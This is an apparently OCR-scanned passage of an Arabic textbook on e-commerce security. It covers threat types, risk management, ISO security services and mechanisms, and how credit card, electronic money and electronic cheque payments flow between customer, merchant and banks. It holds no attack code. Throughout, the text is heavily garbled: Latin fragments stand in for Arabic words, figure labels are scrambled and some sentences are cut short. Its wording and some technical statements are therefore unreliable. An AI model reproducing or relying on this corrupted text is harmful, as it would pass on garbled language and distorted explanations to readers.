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كانت التجارة ولازالت أحدى النشاطات الحامة فى المجتمع . وتتم بين الافراد أو 
آفراد وشركات أو العكس» وكذلك بين الشركات وبعضها البعض . وبعد ظهور 
التجارة الالكترونية» وهی التى تتم عبر الحاسب الآلى وتستغل شبكة الانترانيت أو 
الانترنيت أو شبكة التليفون المحمول» وقد تكون عبر [BV‏ الصناعية . 

وأصبحنا نسمع عن النقود الالكترونية وكذلك الشيكات الالكترونية والتوقیع 
الالکترونی . ومع هذا التقدم المذهل فى هذا المجال ظهرت العمليات التجارية غير 
المشروعة وكذلك التحايل والتزوير » وقد أدى هذا لعمل الحاية الضرورية للأموال 
والمصالح» وهذا ما سنتكلم عنه فى هذا الكتاب وأرجو من الله التوفيق . 
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الباب الأول 
مقدمة عن الأمن 


Introduction to 
Security 


فى هذا الباب نقدم مقدمة مختصرة عن معلومات الأمن » ونشرح التعبيرات 
الأساسية . فهو يعطى فكرة عن أمن المعلومات الأساسية والیات الأمن call‏ يمكن 
استع|ها لدعم سياسة أمن محددة . 
تهديدات الأمن : 
يمكن أن تتعرض النظم لأنواع كثيرة مختلفة للتهديد والحجوم . والتعبير نظام 
(system)‏ هنا أن خدمة متوفرة فى شبكة إتصالات » مثل الانترنيت . وقد تكون خدمة 
(logon)‏ . يقدمها esate‏ يدير نظام تشغيل محدد » أو مركز تسويق فعلى على 
موقع شبكة التاجر . الستخدمون والزودون AUS‏ الخدمة » lo‏ فيهم المستخدمون 
البشريون » هی حاسبات الية ( مضيفة ) ومعالحات حاسبات الية تعرف بالرؤساء 
(principals)‏ . 
الهجوم على نظام يمكن تصنيفه كأنواع متعددة : 
© التنصت ( أو استرقاق السمع ) (eavesdropping)‏ : تداخل وقراءة رسائل خصصة 
¿lo‏ 
© التنكر (masquerading)‏ : إرسال واستقبال رسائل باستعال هوية else‏ 
© العبث بالرسائل (message tampering)‏ : تداخل وتغيير رسائل مخصصة لرؤساء 
ارين 
© التلاعب (replaying)‏ : إستعمال رسائل سبق إرساها لاكتساب حقوق مدير آخر. 
© التسريب (infilteration)‏ : إساءة إستعمال سلطة مدير حتى ينفذ برامج خبيثة أو 


عدائية . 


© تحليل حركة (traffic analysis)‏ : ملاحظة ( مراقبة ) الحركة من أو إل مدير . 
© رفض الخدمة (denial - of - service)‏ منع المدراء ذوى السلطة . 
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مستويات الضاطرة 


Threat probability (\) 
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Serious (v) 
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إدارة المخاطرة : 


طريقة دعم نظام بوظيفية أمن (lo Las‏ بتحليل شامل لعظم التهديدات المحتملة 
وتعرض النظام لها . تحليل المخاطرة (Risk analysis)‏ تقيم العلاقة Gad‏ التهديد» 
وعدد مرات حدوثه وتكاليف تنفيذ آلية حماية مناسبة . ويمكن قياس الحدية بتكاليف 
الاصلاح والتلف الناتج من هجوم ناجح . جدول ( ١ - ١‏ ) يبين تحليل مبسط 
للتكاليف الكلية ١(‏ يعنى التكاليف الكلية الأدنى » و ٩‏ تعنى التكاليف HAN‏ 
يمكن أن تنتج من هجوم محدد . وهذا الاجراء يشار إليه أحيانًا بمستوى المخاطرة ) 
risk level )‏ » والعملية كلها بادارة المخاطرة (risk management)‏ . ومن الواضح أنه 
إذا كان من المحتمل حدوث هجوم HES‏ وكان جادًا We‏ » فسيكون من المكلف أن يتم 
البرؤ منه . ونتيجة لذلك فإن التكلفة ستكون حماية مناسبة . 

تحلیل المخاطرة يجب حدوثه فى طور التخطيط قبل تنفيذ حل أمن محدد . وحيث أن 


Ya 
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الأمن التی نفذت كافية . والانترنيت هی بيئة متغيرة بصفة مستمرة 4 كذلك من منظور 
الأمن » فقد تم إكتشاف تعرض byt dl‏ الحديد فى كل الوقت . فهو دور إدارة الأذعان 
(compliance management)‏ للتحليل سواء كانت وظيفة الأمن الموجودة تقدم نوع 
الحاية التى ضد ما يتوقع . 
خدمات الأمن : 
على أساس نتائج تحليل المخاطرة » يمكن تعريف سياسة المخاطرة والتى تحدد 
بوضوح ما هو المطلوب تأمينه . سياسة الامن لا يمكنها عادة أن تغطى كل الخاطر 
الوظائف التى تقوى سياسة الأمن یشار إليها كخدمات آمن «(security services)‏ 
وتنفذ الخدمات بالیات أمن (security mechanisms)‏ والتى يتم التتحقق las‏ 
LAL‏ بخطوات حل مشفرة (cryptographic-algorithms)‏ وبروتوکولات 
آمنة (secure protocols)‏ . 
الهیته الدولبه للمعاییر : 
(International Organization for Standardization : ISO )‏ 
تعرف خدمات المن الأساسية التالية : 
© التوثيق (authentication)‏ : يؤكد أن كينونة مدير أو cakal‏ بيانات حقيقية وغير 
© تحكم الوصول (access control)‏ : يؤكد أن الرؤساء المخول cod‏ هم فقط الذين 
يمكن أن يكتبوا وصول lL‏ الموارد . 
we‏ فى البيانات (data confidentiality)‏ : تؤكد أن الرؤساء المخول لهم فقط هم 
الذين يمكن أن يفهموا البيانات المحمية ( خصوصية أيضًا : (privacy‏ . 
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© تکامل البيانات Gata integrity)‏ : يؤكد أنه لم يتم تعديل فى البيانات بواسطة 

رؤساء غير مخول لهم . 
©عدم فرض السلطة (nonrepudation)‏ : يؤكد أن الرئيس لا يمكن منعه من أداء 

بعض العمل ف البيانات ( مثل تألیف ‏ أو إرسال » أو إستقبال) . 

خدمة التوئیق يمكن أن تؤكد أن طرف الاتصالات فى الحقيقة هو ما يجب أن يكون . 
وهذا النوع من التوثيق يسمى توثيق كينونة متاثلة (peer entity authentication)‏ 
وإذا قدمت خدمة توثيق برهان OL‏ قطعة معلومات تصدر من مصدر محدد فهى تسمى 
توثيق أصل البيانات (data origin authentication)‏ . 

خدمات خصوصية البيانات قد OSG‏ من نوع ALE‏ أيضًا . ولتأكيد الخصوصية 
بين طرق إتصالات يشكلان قناة إتصالات » تستعمل خدمة خصوصية ربط . وإذا 
كانت قناة الاتصالات منطقية فقط » فإن الخدمة يشار إليها بخصوصية عدم ربط . 
وإذا كانت أجزاء محددة من الرسائل يتم تبادها هى التى يتم حمايتها فقط » فإن خدمة 
خصوصية حقل منتقی هی المطلوبة . فمثلا عندما تكون رسائل HTTP‏ ذات حماية 
SSL‏ فقط ( مثل S-HTTP‏ ). فتوجد خصوصية حقل منتقى . خصوصية إنسياب 
الحركة تحمى ضد تحليل الحركة وتشابه خدمة خصوصية البيانات» فإن خدمات تكامل 
البيانات مختلفة لبروتوكولات موجهة بالربط والتى بدون ربط . وللیروتوکولات الموجهة 
بالربط » فقد تعطى إسترجاع رسالة . خدمات تكامل البيانات يمكنها Lad‏ حماية 
الحقول المنتقاة للرسائل فقط . 

وبناء على ال 180 » فإن خدمات إقرار السلطات يمكنها منع رفض أصل البيانات 
أو تسليم بيانات . ويوجد إحتالان إضافيان : إقرار السلطات بالاذعان والاقرار 
بالتسلم . فهى تحتاج بنية أساسية معقدة جدًا . 
آليات الأمن : 

آليات الأمن يمكن أن تكون محددة أو وقائية . آليات الأمن التالية المحددة يمكن 
Lad Ul‏ خدمات الأمن : 


۱۲ 


© آليات التشفير . 

© آليات التوقيع الرقمى . 

oll ©‏ حکم الوصول . 

© آلیات تکامل البیانات . 

© لیات تبادل التوئیق . 

„UI ©‏ حشو الحركة (Traffic padding mechanisms)‏ . 
© لیات حکم التسییر . 


. (notarization mechanisms) لیات التوثیق‎ © 


آلیات التشفیر تحمی الخصوصية ( الشخصية ) OULU‏ . والية التشفیر تستعمل 
مفتاح دات متاح لجموعة معرفة من الناس فقط . وتلك الجموعة قد تحتوی على 
شخص واحد ( مستقبل البیانات الشفرة ) أو آشخاص متعددین ( مثل فریق موجود 
فى دورة اتصالات ) . وكا سنعرف » فان التوقیع الرقمی آکثر قوة من التوقيع الکتوب 
بالید . ویمکن تولیده بواسطة آلية توقیع رقمية خاصة» وکذلك مثل ما هو لبعض 
الیات التشفير. 

ویمکن أن يؤسس التوثيق على آلية تشفير » ولکن بسبب سیاسی ۰ فإن هذا ليس 
قانونى أو مرغوب دائ) . لذلك » فقد تم تطوير آليات متعددة والتی غرضها الوحيد 
هو تبادل التوثيق (authentication)‏ . 

آليات تحكم الوصول تربط بقوة بتوثيق . وكل فاعل (principal)‏ محدد مجموعة 
موافقات وصول أو حقوق ( أى قراءة أو كتابة أو تنفيذ ) . وكل وصول لمورد ذو حماية 
يتوسط وسيلة حاسب لل مركزى تدعى مراقبة مرجع (reference monitor)‏ وحتى 
تكون قادرة على استعیال موافقات الوصول ab e‏ يجب على الفاعل أن يوثق آولا. وإذا 
كان حكم الوصول قد تم تنفيذه بطريقة صحيحة » فان معظم تسلل الحجوم لا يواجه 


> موثق . یمکنها مثلا‎ ll تکامل البیانات تحمى البیانات من التعدیل‎ a 
شفرة‎ er بواسطة دالة‎ Yel إستعال التوقیعات الرقمية للخصات الرسالة التى تم‎ 
. مكتوبة‎ 

آلیات حشو الحركة تقدم حماية ضد تحليل الحركة . أحيانًا » يمكن لخصم رسم 
قد يكون من الأفضل توليد حركة دمية bad (dummy)‏ المستوى ثابت تقريبًا » بحيث 

آلية تحكم التسيير تجعل من الممكن عمل مسار حدد لارسال بيانات خلال 
شبکة. ف هذه الطریقة ‏ فان عقد الشبکة الوشوق با یمکن انتشائها بحیث 
لا تکون البیانات معرضة هجوم آمن . زيادة على ذلك » إذا كانت البيانات 
الداخلة لشبكة خاصة ليس لما علامة آمن جيدة » فإن إدارى الشبکة یمکن أن یقرر 
رفضها 5 

OUT‏ التوثيق تزود بواسطة موثق طرف ثالث والذى يجب الوثوق به من كل 
المشاركين. ويمكن للموثق العام أن يؤكد تكامل » والأصل وزمن وجهة وصول 
البيانات . فمثلا » فإن الرسالة التى يجب أن تسلم فى وقت محدد قد تكون مطلوبة أن 
أن تضع ختم الزمن » وإذا كان ضروريًا » توقع الرسالة رقميًا . 

معيار ISO‏ يعرف وضع خدمات الامن والآليات فى : 

[Open Systems Interconnection ] OSI 

أو الربط البينى للنظم المفتوحة لموديل مرجع الطبقات السبعة . بعض الخدمات 
يمكن أن تزود عند آکثر من طبقة واحدة إذا كان التأثير على الأمن مختلف جدول ١(‏ - 
CY‏ 





vo 


تکامل‌بدون تكا 
ربط : 


ربط 


3, 
1 
Y 
3, H 
1 


تكامل ربط 
بدون استرداد 


تكامل ربط 
بدون استرداد 


تكامل ربط 
بدون استرداد 
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آليات الامن المنتشرة ليست مخصصة A‏ خدمة أمن عددة . اليات الوظيفية ا موثوق 
مها تعطى قاعدة حساب موئوق ا AN‏ عمليات حاسمة للأمن . 

علامات الامن (security labels)‏ تبين مستوی الحساسية للبيانات ( مثل سرى 
للغاية ) . إسترداد الامن يتضمن إجراءات مثل القوائم السوداء للضيوف أو 
الستخدمین 2 أو الفصل من شبكة عامة : 

تدقیق الأمن dam (security audit)‏ إشراف ابت لنشاطات الأمن الحاسمة فى 
تظام تحت حماية . . كذزلك › فان عمله إختبار كفاية تحکیات نظام وإذعان لسياسة 
الامن الموجودة ( إدارة الإذعان ) . 

EU‏ التدقیق يشار led}‏ بممر تدقيق الامن e (security audittrail)‏ مثل ملفات 
سجل الأحداث (log files)‏ . 

Hol‏ » فان دور كشف الحدث أو كشف التطفل هو مراقبة إنتهاك الأفن المحدد أو 
الأهم هو الأحداث الخطيرة أو عدد مرات حدوث شىء محدد e‏ إذا كانت سياسة الامن 
لشبكة علية Y (LAN)‏ تسمح لمستخدمين بالدخول من خارج الشبكة » فمن الممكن 
كشف أى من تلك المحاولات بالبحث أوتوماتيكيًا فى ملفات سجلات الأحداث عن 
محاولات الدخول حيث متلف Je‏ الستخدم (user domain)‏ عن ذلك المحل . 

إدارة آلية الأمن » كا هى حددة فى معیار ISO‏ هى dels‏ بإدارة الالیات المختلفة . 
ولحدی الوظائف ذات LAY‏ القصوی هی دارة مفتاح (key management)‏ « 
والتی تتضمن تولید والتوزیع الامن لفاتیح مشفرة . 


۳ 





Electronic Payment 
Systems 


نظم الدفع الالکترونی : 
Electronic Payment Systems‏ 
قبل تصميم سياسة آمن » فمن الضروری معرفة النظام الذى سيؤمن والمخاطر التى 
قد يتعرض لما . 
Gs‏ هذا الباب نعطى مقدمة للتجارة الإلكترونية ونظم الدفع الإلكترونى وكذلك 
لأجهزة الدفع . أخيرًا ؛ فهو يناقش الأشياء الأساسية لأمن الدفع الإلكترونى . 
التجارة الإلكترونية : 
التجارة الإلكترونية (electronic commerce)‏ أو (e-commerce)‏ يمكن تعريفها 
كأى تعامل يتضمن بعض تبادل القيمة عير شبكة إتصالات [ ١‏ ] . وهذا التعريف 
العريض يتضمن : 
© تفاعلات آعمال ‏ ل أعمال e‏ مثل EDI‏ ( تبادل البيانات الإلكترونية 
(electronic data interchange)‏ . 
© تعاملات عمل ل أعمال » مثل المحلات المركزية على الشبكة . 
© تعاملات عميل ‏ ل - عميل » مثل نقل قيم مثل الحقائب أو ال حوافظ الإلكترونية 
(electronic wallets)‏ . 
© تعاملات إدارة عميل / أعمال ‏ إلى - جمهور » مثل ملء مرتجعات الضرائب 
الإلكترونية . 
تعاملات آعال - ل - أعال يشار لها JLL dole‏ الإلكترونية (e-business)‏ « 
وتعاملات من عمیل - ل - بنك ببنكية إلكترونية e (e-banking)‏ والتعاملات التى 
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تتضمن إدارة dale‏ با حكومة الإلكترونية .(e-government)‏ شبكة إتصالات التجارة 
الإلكترونية قد تکون شبكة خاصة ( مثل شبكة المقاضة delhi,‏ بتبادل OLLA‏ 
والشيكات بين البنوك interbank clearing network‏ » أو إنترانيت أو إنترنيت » أو 
حتی شبكة التليفون المحمول . وفى هذا الجزء » فان التركيز على تعاملات العمیل -ل- 
JEM‏ عبر الإنترنيت وعلى نظم الدفع الإلكتروني والتى تعطى طريقة آمنة لتبادل 
القيمة بين العملاء Ns‏ . 
نظم الدفع الإلكترونى : 

نظم الدفع الإلكتروني (electronic payment systems)‏ : ظهرت من نظم الدفع 
التقليدية ونتيجة لذلك » فان نوعى النظم مشتركة فى أشياء كثيرة . ونظم الدفع 
الإلكترونى أكثر قوة خاصة بسبب وسائل الامن المتقدمة والتى ليس ها تماثل فى نظم 
الدفع التقليدى . ونظام الدفع الإلكترونى عمومًا يشير لأى نوع خدمة من الشيكات 
(مثل » الإنترنيت) والتى تتضمن تبادل النقود للبضاتع أو للخدمات . والبضائع قد 
تكون بضائع طبيعية مثل الكتب أو الأقراص (CDs) el‏ أو بضائع إلكترونية مثل 
الوثائق الإلكترونية » أو الصور أو الموسيقى . وبالثل » توجد خدمات تقليدية مثل 
حجز الفنادق أو شراء تذاكر الطيران ( والحجز ) وكذلك الخدمات الإلكترونية مثل 
تحليل سوق المال فى شكل إلكتروني » ونظم الدفع الالکترونی ليست فكرة جديدة « 
النقود الإلكترونية ۰6 فقد تم استعی‌اها بين البنوك فى شكل نقل اعتادات (funds)‏ منذ 
عام ۱۹۲۰ . ومنذ مدة طويلة » أصبح العملاء قادرين على سحب نقود من الات 
السحب (automatic teller machies : ATMs ) JY)‏ . 

نظام الدفع المعتاد مبین فى شكل ( ۱-۲ ) . وحتى يشارك فى نظام دفع إلكترونى . 
محدد » فان العميل والتاجر يجب أن يكونا قادرين على الوصول للإنترنيت ويجب I‏ 
أن يسجلا مع مزود خدمة الدفع المقابل . والمزود ينفذ بوابة دفع والتى يتم الوصول U‏ 
من كلا الشبكة العامة ( مثل الإنترنيت ومن شبكة إخلاء بنك بيئية خاصة . 


Ye 


بوابة الدفع تخدم كمتوسط بين البنية التحتية للدفع التقليدى وبين البنية التحتية 
للدفع الإلكترونى . وشرط آخر هو أن العميل والتاجر كل منهیا له حساب فى البنك 
مربوط مع شبكة مقاصة (clearing)‏ . حساب العميل يشار إليه عادة thy‏ الصادر . 
والتعبیر (Issuer Bank)‏ يدل على البنك الذى صدر جهاز الدفع (مثل کارت ائتان أو 
مدین) والذی یستعمله العمیل للدفع ۱ 
شکل )1.17( : نظام abo‏ الکترونی معتاد 


Issuer (Y) Acquirer 
O) Bank pE 2 دناه‎ Bank (y) 
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(E) Withdrawal N e ES Deposit (0) 


Registration (Y) 
Payment authorization (A) 
Payment transaction (4) 


(0) 







Payment 


(0) 


Customer Merchan 












am (Payer) (Payee) am 
. مقاصة‎ (clearing). بنك الصادر . (۲) الينك المستفيد . (۳) شبكة البنك الوسيط‎ )۱( 
. تسجیل‎ (Y) . سحب . (۵) ایداع . )11( تسجیل‎ (£) 
. توکیل دفع . )4( تعامل دفع . (۱۰) اطار الدفع . (۱۱) الدفع‎ (A) 


)11( العمیل (الداقع). (۱۳) التاجر ( الذى یدفع له ) . 

البنك الکتسب يحرز سجلات دفع ( آی شرائح ورق أو بیانات الكترونية ) من 
التجار . وعند شراء بضائع أو حدمات » فان الستهلك أو الذی یقوم بالدفع یدفع 
كمية محددة من النقود للتاجر ( أو الستفید ) . فاذا آفترضنا أن الستهلك يختار أن یدفع 


۳۱ 











فإن التاجر يطلب من إطار الدفع ( أو الدخل ) أن يعطى للدافع الصلاحية 
للدافع وجهاز الدفع ( أو على أساس رقم بطاقته . إطار الدفع يتصل ببنك الدفع 
بأن يؤدى فحص الصلاحية . وإذا كان كل شىء على ما يرام » فإن كمية النقود 
المطلوبة يتم سحبها (أو (debited‏ من حساب المستهلك وتوضع فى حساب التاجر 
( أو (credited to‏ . 

وهذه العملية تمثل تعامل الدفع الفعلى : إطار الدفع يرسل إشعار (notification)‏ 
عن تعامل الدفع الناجح للتاجر بحيث يمكنه أن یزود البنوك المطلوبة للعميل. dy‏ 
yan‏ الحالات » خاصه عند طلب الخدمات aS ols‏ المنخفضة 6 يمكن 
تسليم البنود قبل تفويض الدفع الفعلى ويتم عمل التعامل . 
اللامرکزی مع المركزى : 

يمكن أن يكون نظام الدفع الإلكترونى مركزى si (online)‏ لا مركزى (offline)‏ . 
ففى النظام اللامركزى ۰ فإن الذى يدفع والمستفيد على الخط مع بعضه) أثناء تعامل 
الدفع » ولكن ليس bet‏ ربط إلكترونى مع بنكيهما . وف هذا السيناريو » لیس 
للمستفيد إمكانية أن يطلب تفويض من بنك المصدر ( عبر إطار الدفع ) » لذلك فلا 
يمكنه أن يتأكد أنه سيتسلم نقوده فعليًا . وبدون توكيل » فمن الصعب منع الذى 
يدفع من أن يرسل نقود أكثر عبا يمتلكه فعليًا . أساسًا » هذا السبب e‏ فان معظم 
نظم دفع الإنترنيت المقترحة مرکزیا . 

النظام المركزى يحتاج للوجود المركزى لخادم توكيل » والذى يمكن أن يكون جزءًا من 
البنك الصادر أو البنك المستفيد . وبوضوح » فان النظام المركزى يحتاج لاتصالات 
آکش ولکنه آمن آکثر من النظام اللامركزى . 
الدین آمام الدائن : 

یمکن لنظام الدفع الالکترونی أن يؤسس على دائن (credit based)‏ أو على مدین 


YY 


(debit based)‏ . ونی النظام المؤسس على دائن ( أى كروت OB ۰ COLSY‏ الودائع 
ترسل ساب الذى يقوم بالدفع . بعد ذلك يقوم الدافع بدفع الكميات 
الدین ) » فان حساب الدافع یسجل فى JU‏ » أى بمجرد معا حة التعامل . 
ماکرو ومیکرو : 

نظام الدفع الالکترونی والذی يتم فيه تبادل كمية كبيرة نسبیّا من النقود يشار إليه 
dole‏ بنظام دفع ماکرو (macro)‏ . ومن الناحية الأخرى » إذا كان نظام للدفع الصغیر 
دحتی © آورو ) 6 فانه پسمی نظام دفع ميكرو (micro)‏ . ودور الكمية يلعب دور 
کب فى تصمیم النظام والقرار الخاص سياسة الامن . ولا يدعو لشیء لتنفيذ 
بروتوکولات أمن غالية الثمن ALL‏ عملات إلكترونية مثلاً ذات قيمة منخفضة : وفى 
عدد ضخم من العملات يمكن أن تسرق . 
أجهزة الدفع : 

أجهزة الدفع هى وسائل دفع العملات الورقية » وبطاقات الائتمان » والشيكات 
هى أجهزة دفع تقليدية . 

نظم الدفع الإلكترونية قد قدمت جهازين جديدين للدفع : النقود الا لکترونية 
(كذلك تسمى النقود الرقمية) والشيكات الإلكترونية . وكا تتضمن الأساء » فهذه لا 
تمثل نموذجًا جديدًا » ولكنها تمثيل إلكترونى لاجهزة الدفع التقليدية . فى كثير من 
النواحى » فهى تختلف عن سابقتها . كل أجهزة الدفع هی فى الحقيقة أن السريان 
الفعلى للنقود يحدث من حساب الدافع OLA‏ المدفوع له . 

نظم الدفع شبه / النقدى (cash - like)‏ ونظام الدفع شبه / ee‏ 


۳۳ 


فقی نظام الدفع شبه النقدى ۰ يقوم الدافع بسحب كمية محددة من النقود (مثل » 
العملات الورقية والنقود الإلكترونية ) من حسابه ويستعمل هذه النقود عندما يرغب 
فى الدفع . 

فى نظام شبه الشيك » تظل النقود فى حساب الدافع حتى يتم عمل شراء » يقوم 
الدافع بإرسال أمر دفع للمستفيد » على الأساس الذى سيتم سحب النقود عليه من 
حساب الدافع وتودع فى حساب المستفيد . 

أمر الدفع قد يكون قطعة من الورق ( قصاصة نقل / بنك ) أو وثيقة إلكترونية (مثل 
شيك إلكترونى) . 

الأجزاء الثلاثة التالية تعطی عرض لعاملات الدفع والتى تتضمن أجهزة دفع 
بطاقات الاتتمان : 

بعض نظم الدفع الإلكترونية عبارة عن أجهزة دفع تقليدية. بطاقة EN‏ 
Ses (credit cards)‏ » حاليًا هی أكثر أجهزة الدفع إنتشارًا على الإنترنيت . وكانت 
del‏ بطاقة Ole!‏ قدمت منذ عقود مضت . وقد تم تقديم بطاقات الائتان بشرائط 
مغناطيسية تحتوى على معلومات قراءة فقط غير مشفرة . حاليًا > كارتات أكثر وأكثر 
هى البطاقات الذكية (smart cards)‏ وتحتوى على أدوات أجزاء صلبة ( شرائح ) 
تقدم تشفير وسعة تخزين أكبر . وحديثا » حتى بطاقات Y‏ الفعلية ( حقائب 
برامج إلكترونية » مثل واحدة بواسطة Trintech Cable & Wireless‏ قد ظهرت 
فى الأسواق . | 

شكل ( ۲-۲ ) يوضح تعامل دفع معتاد ببطاقة ائتمان كجهاز الدفع [ 5 ] . 
والعميل يعطى معلومات كارت OLI‏ الخاصة به (المصدرء وتاريخ إنتهاء الصلاحية 
والرقم ) للتاجر(1) . والتاجر یسأل البنك الستفید للتوکیل )2( . والبنك الستفید 
يرسل رسالة عبر شبكة البنك الوسیط (interbank)‏ للبنك الصدر يسأل عن التوکیل 
(3) . البنك الصدر پرسل استجابة توکیل )3( . إذا كانت الاستجابة موجبة » فان 


ví 


البنك المستفيد يرسل للتاجر بأن الشحنة قد قبلت الآن » التاجر يمكنه إرسال البضائع 
المطلوبة ( أو الخدمات ) للعميل )4( » وحينئذ يقدم الشحنة ( أو دفعة من الشحنات 
عثل عديد من التعاملات ) للبنك المستفيد ( 5 علوى ) . البنك المستفيد يرسل طلب 
ترشيح للبنك الصادر ( 6 باليسار ) . البنك الصادر يضع النقود فى حساب ترشيح 
بنك وسيط ( 6 باليمين ) ويشحن كمية الباع حساب بطاقة ائتمان العميل . وفى فترات 
منتظمة ( شهريًا مثلا ) » فإن البنك الصادر يرسل إشعار للعميل بالتعاملات 
وشحناتها المتراكمة (7) . حينئذ » فان العميل يدفع الشحنات للبنك ببعض الوسائل 
الأخرى ( مثل طلب مدين مباشر ) أو تحويل بنك أو شيك . وف نفس الوقت » فان 
البنك المستفيد قد سحب كمية الباع من حساب ترشيح البنك الوسيط ويصدق على 
حساب التاجر ( 5 أسفل ) . وضرورة حماية الخصوصية لبيانات التعامل للدفع DES‏ 
من حالات سرقة أرقام بطاقات OS‏ . ومنذ فترة كانت ترسل بدون تشفير عبر 
الإنترنيت» وكانت أرقام بطاقات الائتعان تستعمل باحتيال بواسطة أشخاص اخرین 
(الذين لا يملكونها) » حقيقة فى معظم الحالات بواسطة تجار غير أمناء . ويوجد 
بعض الحاية ضد الخداع أن التوكيل مطلوب للجميع ولكن تعامل ذو قيمة منخفضة 
والشحنات التى ليس لما توكيل عليها إحتجاج وتعاد لستون يومًا تقريبًا بعد 
الاعتراض عليها . ومع ورود التجارة الإلكترونية » وخاصة تجارة الشبكة (Web com-‏ 
cmerce)‏ أصبحت الاحتيالات الاطرة ممكنة الحدوث . وفى الظروف الحاضرة » فمن 
الضرورى عمل أرقام لبطاقات الائتمان ‏ فى الحقيقة » معلومات الدفع عمومًا ‏ غير 
مقروءة ليس فقط لمعظم المتطفلين » ولكن بالنسبة لكل أطراف التجارة الإلكترونية 
فيا عدا العميل والبنك الخناص به . وهذا آیضا يمكنه حل مشكلة غفل الاسم » 
لأنه فى بعض الحالات يمكن أن يحدد العميل على أساس رقم كارت ON‏ 
وكثير من العملاء سيظلون مجهولى الاسم للتجار . عمومّا » فان الاستعمال 
الخادع لارقام بطاقات الائتمان Ley‏ من مصدرين أساسيين : التطفل والتجار 
الغير أمناء . 


أرقام بطاقات الائتمان يمكن حمايتها ضد : 
© التطفل فقط بواسطة التشفير ( مثل (SSL‏ . 
© التجار الغير أمناء فقط بواسطة رقم بطاقة الائتمان « الاسم الستعار » . 
© كلا التطفل والتجار الغير أمناء بالتشفير والتوقيع المزدوج . 
وكل هذه الآليات سنذكرها . 


شكل (rar)‏ : تعامل دفع بطاقة انتمان 


(y) Issuer (N Acquirer 
Bank ore e ETS : en Bank (X) 
¿"Interbank (clearing) network, 

3 Authorization 3 ZEN 
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7 Notificatio Interbank settlement 2 auth 5 Charges 
account (7) 
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1Credit card info 


4+ TOT 
Customer (A) Merchant 
(Payer) (4) (Payee) 








)1( بنك الصادر . )1( شبكة البنك الوسيط (clearing)‏ مقاصة . 

)1( البنك الستفید . (E)‏ (3): توکیل (6): ترسیخ. ۰ (۵) إشعار. 

)1( حساب ترسیخ البنك الوسیط (7). (Y)‏ شحنات (5) . توکیل (2). 

.)1( العمیل ( الدافع )۰ (۱۰) معلومات بطاقة الانتمان‎ )٩( = ( المستفيد ( التاجر‎ (A) 
: النقود الالکترونبه‎ 

النقود الا لکترونية (electronic money)‏ هی التمئیل الالکترونی للنقود التقليدية . 
ووحدة النقود الالكترونية يشار ها Sole‏ بالعملة الرقمية أو الالكترونية (electronic or‏ 


. digital coin) 


۳۹ 











وللكلام التالى » فإن القيمة الفعلية للعملة الرقمية فى وحدات النقود التقليدية 
ليست ها علاقة بالوضوع . العملات الرقمية تولد (minted)‏ بواسطة وسطاء 
(سماسرة : (brokers‏ إذا أراد عميل شراء عملة رقمية » فإنه يتصل بوسيط e‏ ويطلب 
كمية محددة من العملات » ويدفع نقود فعلية . حينئذ ۰ يمكن للعميل أن يقوم 
بالشراء من rl‏ یقبل العملات الرقمية لذلك الوسيط . وکل تاجر یمکنه 
الاسترداد من عملات الوسیط التی تم احصول علیها من العملاء » بمعنی آخر فان 
الوسیط يأخذ العملات مرة أخرى ویضع فى حساب التاجر نقود فعلية . 

شکل ( ۳-۲ ) یوضح تعامل نقود الکترونية معتاد . وی هذا المثال یمکن أن یکون 
البنك الصدر هو الوسیط فى نفس الوقت » أى العمیل والتاجر . ويجب أن یکون 
للعمیل والتاجر حساب جاری أو شیکات . وحساب الشیکات (checking ac-‏ 
count)‏ ضروری کشکل عبور بين النقود الفعلية والنقود الالكترونية » على الأقل طالما 
أن النقود الالكترونية معروفة yo‏ کعملة . وعندما یشتری العمیل عملات رقمية e‏ 
فان حساب شیکاته مدين ( 0 ) . 

OV‏ » یمکنه استعیال العملات الرقمية للشراء de‏ الانترنیت (1) . وحیث أن 
العملات الرقمية تستعمل PiS‏ لشراء خدمات ذات قيمة منخفضة ( أو بضائع 
منخفضة القيمة ) » فان التاجر يملا Sole‏ طلب العمیل قبل أو حتی بدون أن يسأل 
عن أى نوع من توکیل دفع . حينئذ » پرسل التاجر طلب استرداد (redemption re-‏ 
quest)‏ للبنك المستفيد ( 3 ) . وباستعال الية ترسيخ بنك وسيط تشبه تلك المذكورة 
سابقا » فان البنك المستفيد يسترجع العملات عند البنك المصدر ( 4 ) ويضع 
العملات فى حساب التاجر بقيمة مكافقة للنقود الحقيقية . 
الشيك الالكترونى : 

الشيكات الالكترونية (electronic checks)‏ هی الکانیء الالكترونى للشيكات 
الورقية التقليدية . والشيك الالكترونى عبارة عن وثيقة الكترونية تحتوى de‏ 
البيانات التالية : ش 


۳۷ 


© رقم الشيك . 
© إسم الدافع . 
© رقم حساب الدافع وإسم البنك . 
@ اسم المستفيد (payee)‏ . 
© القيمة التى ستدفع . 
© وحدة العملة المستعملة . 
© تاريخ الصلاحية . 
© التوقيع الالكترونى للدافع . 
© التظهير الالكترونى للشيك المستفيد . 
شكل (TaT)‏ : تعامل دفع نقود الكترونية 


edo Sn Acquirer 
ae ۳ r (ww بط‎ Bank (Y) 


D mre. 
ری‎ [Checking |” “.. Interbank settlement” Checking | (y) 
account account (oy) account 
(A) 


0 Debit by coins} 3 Ges redeem coins) 
(ys) (4) 
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. ) شبكة البنك الوسيط ( المقاصة‎ (T) . البنك المستفيد‎ (y) البنك الصادر‎ )١( 

)£( رسوخ (4). )0( حساب ترسيخ البنك الوسيط . (1) فحص الحساب . 

.)3( دائن الاسترداد عملات‎ )٩( (0) ) دين ( شراء عملات‎ (A) فحص حساب.‎ (V) 
.) العميل ( الدافع ). (۱۲) التاجر (المدفوع له‎ )۱۱( (1) 001101100 aña (V) 


YA 




















شكل ( ٤-۲‏ ) يبين تعامل abo‏ معتاد ويتضمن الشيكات الالكترونية . والعميل 
يطلب بعض البضائع أو الخدمات من التاجر » وعندما يرسل التاجر فاتورة الكترونية 
للعميل(1) . وكدفع » فان العميل يرسل شيك الکترونی موقع الكترونيًا (2) . 
(التوقيع الالكترونى مؤسس على تشفير مفتاح ( عام ) . وكا هو مع الشيك الورقی © 
فان التاجر مفترض أن يظهر الشيك ( أى يوقع عليه فى الخلف ) (3) . ( التظهير 
الالكترونى هو نوع من التوقيع الالكترونى ) . البنكين » الصدر والمستفيد يران أن 
كمية البیعات تم سحبها فعلاً من حساب العميل وأضيفت ساب التاجر (4) : 
وبعد تسلم الشيك من العميل » يمكن للتاجر أن يشحن البضائع أو يقدم 











. الخدمات الطلوبة‎ 
